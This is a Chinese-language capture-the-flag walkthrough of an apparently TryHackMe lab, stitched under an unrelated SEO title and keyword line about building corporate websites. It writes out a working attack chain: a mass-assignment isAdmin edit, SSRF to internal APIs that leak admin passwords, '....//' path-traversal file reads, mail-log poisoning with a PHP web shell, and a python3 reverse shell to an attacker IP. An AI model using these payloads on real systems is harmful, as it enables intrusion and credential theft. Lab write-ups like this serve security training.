企业官网建设流程全解析

巩义网站建设费用,销售网站怎么做的,网站建设推广 seo,信息发布型网站题目 Even if its not accessible from the browser, can you still find a way to capture the flags and sneak into the secret admin panel? “即使浏览器无法访问#xff0c;你还能找到办法捕获旗帜并潜入秘密管理员面板吗#xff1f;” 信息收集 扫端口…题目Even if its not accessible from the browser, can you still find a way to capture the flags and sneak into the secret admin panel?“即使浏览器无法访问你还能找到办法捕获旗帜并潜入秘密管理员面板吗”信息收集扫端口nmap -p- 10.80.189.83PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd |_smtp-commands: mail.filepath.lab, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, | ssl-cert: Subject: commonNameip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 |_ssl-date: TLS randomness does not represent time 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: UIDL SASL TOP STLS AUTH-RESP-CODE CAPA RESP-CODES PIPELINING | ssl-cert: Subject: commonNameip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 143/tcp open imap Dovecot imapd (Ubuntu) |_imap-capabilities: SASL-IR ENABLE more IMAP4rev1 post-login ID LOGINDISABLEDA0001 Pre-login OK capabilities IDLE listed STARTTLS LITERAL have LOGIN-REFERRALS | ssl-cert: Subject: commonNameip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 993/tcp open ssl/imap Dovecot imapd (Ubuntu) |_imap-capabilities: SASL-IR ENABLE more AUTHPLAIN post-login ID AUTHLOGINA0001 Pre-login OK IMAP4rev1 IDLE listed capabilities LITERAL have LOGIN-REFERRALS | ssl-cert: Subject: commonNameip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 995/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: UIDL SASL(PLAIN LOGIN) TOP USER AUTH-RESP-CODE CAPA RESP-CODES PIPELINING | ssl-cert: Subject: commonNameip-10-10-31-82.eu-west-1.compute.internal | Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal | Not valid before: 2021-11-10T16:53:34 |_Not valid after: 2031-11-08T16:53:34 4000/tcp open http Node.js (Express middleware) |_http-title: Sign In 50000/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: System Monitoring Portal Service Info: Host: mail.filepath.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernelflag1在4000端口找到如下在端口50000下找到如下页面这里是一个Sysmon系统页面里面有一句话如下Note: This website is intended for authorized personnel only. Be advised that every action and request within this system is subject to monitoring and logging. Unauthorized access or misuse of this portal will be addressed in accordance with company policies and applicable laws.还有一个登录页面跑一下目录。4000没有跑出来东西50000也没啥东西回到4000端口我们刚进来的时候直接就是登录页面刚发现之前没注意的游客账户的账户密码尴尬了登录一下逛了一圈在查看个人资料这里看到一个线索isAdmin下面有一个功能点这里推荐的东西会出现在上面那我们猜测一下应该也可以对里面的参数进行修改尝试修改名字可以修改那修改isadmin多了一个API的功能访问看了一下结果如下我们整理一下数据Internal API GET http://127.0.0.1:5000/internal-api HTTP/1.1 Host: 127.0.0.1:5000 Response: { secretKey: superSecretKey123, confidentialInfo: This is very confidential. } Get Admins API GET http://127.0.0.1:5000/getAllAdmins101099991 HTTP/1.1 Host: 127.0.0.1:5000 Response: { ReviewAppUsername: admin, ReviewAppPassword: xxxxxx, SysMonAppUsername: administrator, SysMonAppPassword: xxxxxxxxx, }这里看到想要进入5000端口需要使用本机IP发送请求。在我们更改isAdmin后在settings的位置可以看到如下也页面很明显这里就是让我们做ssrf请求的位置!将接口http://127.0.0.1:5000/internal-api放到里面发送后结果如下这里看到base64应该是base64解码eyJzZWNyZXRLZXkiOiJzdXBlclNlY3JldEtleTEyMyIsImNvbmZpZGVudGlhbEluZm8iOiJUaGlzIGlzIHZlcnkgY29uZmlkZW50aWFsIGluZm9ybWF0aW9uLiBIYW5kbGUgd2l0aCBjYXJlLiJ9 解码后 {secretKey:superSecretKey123,confidentialInfo:This is very confidential information. Handle with care.}这里推断出每次发送ssrf之后都会把结果以 base64 编码的形式发送到/admin/settings 页面发送我们获取的admin的API接口http://127.0.0.1:5000/getAllAdmins101099991 结果eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2aWV3QXBwUGFzc3dvcmQiOiJhZG1pbkAhISEiLCJTeXNNb25BcHBVc2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0 解码后 {ReviewAppUsername:admin,ReviewAppPassword:admin!!!,SysMonAppUsername:administrator,SysMonAppPassword:S$9$qk6d#**LQU}成功拿到SysMonApp的管理员密码以及ReviewAp的管理员密码ReviewAppUsernameadmin ReviewAppPasswordadmin!!! SysMonAppUsernameadministrator SysMonAppPasswordS$9$qk6d#**LQU登录50000页面拿到flag1THM{!50_55Rf_1S_d_k3Y??!}flag2继续逛这里找了很多地方最后在网站源码中看到一个可疑点注意这里的profile.php尝试访问了一下结果如下有戏既然这里没有直接解析成图片那说不定可以进行本地文件读取这里尝试了很多方式最后找到了绕过方式payload如下....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd这里看了一下passwd文件发现了两个用户joshua charles尝试读取私钥果然不行整理一下思路通过4000打到50000现在手机有一个本地文件包含。但貌似做了一些限制。本地文件包含不是经常配合文件上传的图片马等漏洞做配合吗。更改这么多协议会不会是让我们包含日志尝试读取一下上面哪些协议的日志先看22的http://10.80.189.83:50000/profile.php?img....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/auth.log邮服的http://10.80.189.83:50000/profile.php?img....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log尝试 ssh的写马能不能实现不行做了限制。日志没有记录换邮服的nc连一下nc -nv 10.80.189.83 25尝试写马HELO attacker.com MAIL FROM:testtest.com RCPT TO:?php system($_GET[cmd]); ? DATA Subject: Test Log Injection This is a test. . QUIT看一下日志http://10.80.189.83:50000/profile.php?img....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.logcmdid读取成功这里尝试反弹shell攻击主机IP nc -lvnp 4444这里试了几个反弹shell最后通过python反弹过来了python3 -c import socket,os,pty;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((10.80.103.9,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(/bin/bash)这下面有一个贼长的文件。拿到最后的flagTHM{505eb0fb8a9f32853b4d955e1f9123ea}